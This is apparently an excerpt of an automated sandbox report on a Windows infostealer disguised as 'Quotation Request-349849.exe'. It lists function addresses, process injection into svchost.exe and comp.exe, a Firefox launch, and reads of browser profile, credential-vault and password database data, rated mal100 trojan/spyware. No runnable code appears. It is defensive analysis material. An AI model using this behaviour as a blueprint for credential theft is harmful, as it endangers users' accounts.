                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004024303_2_00402430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040FE7B3_2_0040FE7B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040FE833_2_0040FE83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004167B33_2_004167B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C003E63_2_03C003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E3F03_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFA3523_2_03BFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC02C03_2_03BC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE02743_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF41A23_2_03BF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C001AA3_2_03C001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF81CC3_2_03BF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDA1183_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B301003_2_03B30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC81583_2_03BC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD20003_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3C7C03_2_03B3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B407703_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B647503_2_03B64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5C6E03_2_03B5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C005913_2_03C00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B405353_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEE4F63_2_03BEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE44203_2_03BE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF24463_2_03BF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF6BD73_2_03BF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFAB403_2_03BFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA803_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A03_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C0A9A63_2_03C0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B569623_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B268B83_2_03B268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E8F03_2_03B6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4A8403_2_03B4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B428403_2_03B42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBEFA03_2_03BBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4CFE03_2_03B4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B32FC83_2_03B32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B60F303_2_03B60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE2F303_2_03BE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B82F283_2_03B82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB4F403_2_03BB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52E903_2_03B52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFCE933_2_03BFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFEEDB3_2_03BFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFEE263_2_03BFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40E593_2_03B40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B58DBF3_2_03B58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3ADE03_2_03B3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDCD1F3_2_03BDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4AD003_2_03B4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0CB53_2_03BE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B30CF23_2_03B30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40C003_2_03B40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B8739A3_2_03B8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF132D3_2_03BF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2D34C3_2_03B2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B452A03_2_03B452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE12ED3_2_03BE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5B2C03_2_03B5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4B1B03_2_03B4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C0B16B3_2_03C0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2F1723_2_03B2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7516C3_2_03B7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF70E93_2_03BF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFF0E03_2_03BFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEF0CC3_2_03BEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B470C03_2_03B470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFF7B03_2_03BFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF16CC3_2_03BF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B856303_2_03B85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C095C33_2_03C095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDD5B03_2_03BDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF75713_2_03BF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFF43F3_2_03BFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B314603_2_03B31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5FB803_2_03B5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB5BF03_2_03BB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7DBF93_2_03B7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFFB763_2_03BFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDDAAC3_2_03BDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B85AA03_2_03B85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE1AA33_2_03BE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEDAC63_2_03BEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB3A6C3_2_03BB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFFA493_2_03BFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF7A463_2_03BF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD59103_2_03BD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B499503_2_03B49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5B9503_2_03B5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B438E03_2_03B438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAD8003_2_03BAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFFFB13_2_03BFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B41F923_2_03B41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFFF093_2_03BFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B49EB03_2_03B49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5FDC03_2_03B5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF7D733_2_03BF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF1D5A3_2_03BF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B43D403_2_03B43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFFCF23_2_03BFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB9C323_2_03BB9C32
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A020006_2_00A02000
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A241A26_2_00A241A2
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A301AA6_2_00A301AA
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A281CC6_2_00A281CC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009601006_2_00960100
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A0A1186_2_00A0A118
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009F81586_2_009F8158
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009F02C06_2_009F02C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A102746_2_00A10274
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A303E66_2_00A303E6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0097E3F06_2_0097E3F0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A2A3526_2_00A2A352
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A1E4F66_2_00A1E4F6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A144206_2_00A14420
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A224466_2_00A22446
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A305916_2_00A30591
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009705356_2_00970535
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0098C6E06_2_0098C6E0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0096C7C06_2_0096C7C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009947506_2_00994750
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009707706_2_00970770
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009568B86_2_009568B8
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0099E8F06_2_0099E8F0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009728406_2_00972840
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0097A8406_2_0097A840
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A3A9A66_2_00A3A9A6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009729A06_2_009729A0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009869626_2_00986962
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0096EA806_2_0096EA80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A26BD76_2_00A26BD7
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A2AB406_2_00A2AB40
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A10CB56_2_00A10CB5
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00960CF26_2_00960CF2
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00970C006_2_00970C00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00988DBF6_2_00988DBF
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0096ADE06_2_0096ADE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0097AD006_2_0097AD00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A0CD1F6_2_00A0CD1F
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00982E906_2_00982E90
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A2CE936_2_00A2CE93
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A2EEDB6_2_00A2EEDB
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A2EE266_2_00A2EE26
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00970E596_2_00970E59
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009EEFA06_2_009EEFA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00962FC86_2_00962FC8
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0097CFE06_2_0097CFE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A12F306_2_00A12F30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00990F306_2_00990F30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009B2F286_2_009B2F28
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009E4F406_2_009E4F40
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A2F0E06_2_00A2F0E0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A270E96_2_00A270E9
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009770C06_2_009770C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A1F0CC6_2_00A1F0CC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0097B1B06_2_0097B1B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A3B16B6_2_00A3B16B
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0095F1726_2_0095F172
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A516C6_2_009A516C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009752A06_2_009752A0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A112ED6_2_00A112ED
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0098B2C06_2_0098B2C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009B739A6_2_009B739A
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A2132D6_2_00A2132D
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0095D34C6_2_0095D34C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A2F43F6_2_00A2F43F
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009614606_2_00961460
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A0D5B06_2_00A0D5B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A395C36_2_00A395C3
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A275716_2_00A27571
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A216CC6_2_00A216CC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009B56306_2_009B5630
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A2F7B06_2_00A2F7B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009738E06_2_009738E0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009DD8006_2_009DD800
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A059106_2_00A05910
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009799506_2_00979950
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0098B9506_2_0098B950
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A11AA36_2_00A11AA3
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A0DAAC6_2_00A0DAAC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009B5AA06_2_009B5AA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A1DAC66_2_00A1DAC6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A27A466_2_00A27A46
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A2FA496_2_00A2FA49
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009E3A6C6_2_009E3A6C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0098FB806_2_0098FB80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009ADBF96_2_009ADBF9
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009E5BF06_2_009E5BF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A2FB766_2_00A2FB76
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A2FCF26_2_00A2FCF2
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009E9C326_2_009E9C32
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0098FDC06_2_0098FDC0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A27D736_2_00A27D73
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00973D406_2_00973D40
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A21D5A6_2_00A21D5A
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00979EB06_2_00979EB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00971F926_2_00971F92
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A2FFB16_2_00A2FFB1
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00933FD26_2_00933FD2
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00933FD56_2_00933FD5
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00A2FF096_2_00A2FF09
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00411C006_2_00411C00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0040CB286_2_0040CB28
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0040CB306_2_0040CB30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0040CD506_2_0040CD50
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0040AD306_2_0040AD30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0040AE746_2_0040AE74
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0040AE806_2_0040AE80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_004152606_2_00415260
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_004134606_2_00413460
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0042B9106_2_0042B910
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_02D9E6EB6_2_02D9E6EB
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_02D9E4656_2_02D9E465
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_02D9E5836_2_02D9E583
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_02D9D9E86_2_02D9D9E8
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_02D9E91C6_2_02D9E91C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_02D9CC836_2_02D9CC83
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: String function: 007F8900 appears 42 times
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: String function: 007D7DE1 appears 35 times
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: String function: 007F0AE3 appears 70 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 111 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 009A5130 appears 58 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 009EF290 appears 105 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 009B7E54 appears 111 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 0095B970 appears 277 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 009DEA12 appears 86 times
                Source: Quotation Request-349849.exe, 00000000.00000003.1330543235.000000000409D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation Request-349849.exe
                Source: Quotation Request-349849.exe, 00000000.00000003.1329701873.0000000003EF3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation Request-349849.exe
                Source: Quotation Request-349849.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@6/5
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083A06A GetLastError,FormatMessageW,0_2_0083A06A
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_008281CB AdjustTokenPrivileges,CloseHandle,0_2_008281CB
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_008287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_008287E1
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0083B3FB
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0084EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0084EE0D
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0083C397
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007D4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_007D4E89
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeFile created: C:\Users\user~1\AppData\Local\Temp\autD4EB.tmpJump to behavior
                Source: Quotation Request-349849.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: comp.exe, 00000006.00000002.2558167888.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2558167888.00000000006DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Quotation Request-349849.exeReversingLabs: Detection: 47%
                Source: unknownProcess created: C:\Users\user\Desktop\Quotation Request-349849.exe "C:\Users\user\Desktop\Quotation Request-349849.exe"
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quotation Request-349849.exe"
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeProcess created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"
                Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quotation Request-349849.exe"Jump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeProcess created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeSection loaded: mswsock.dllJump to behavior
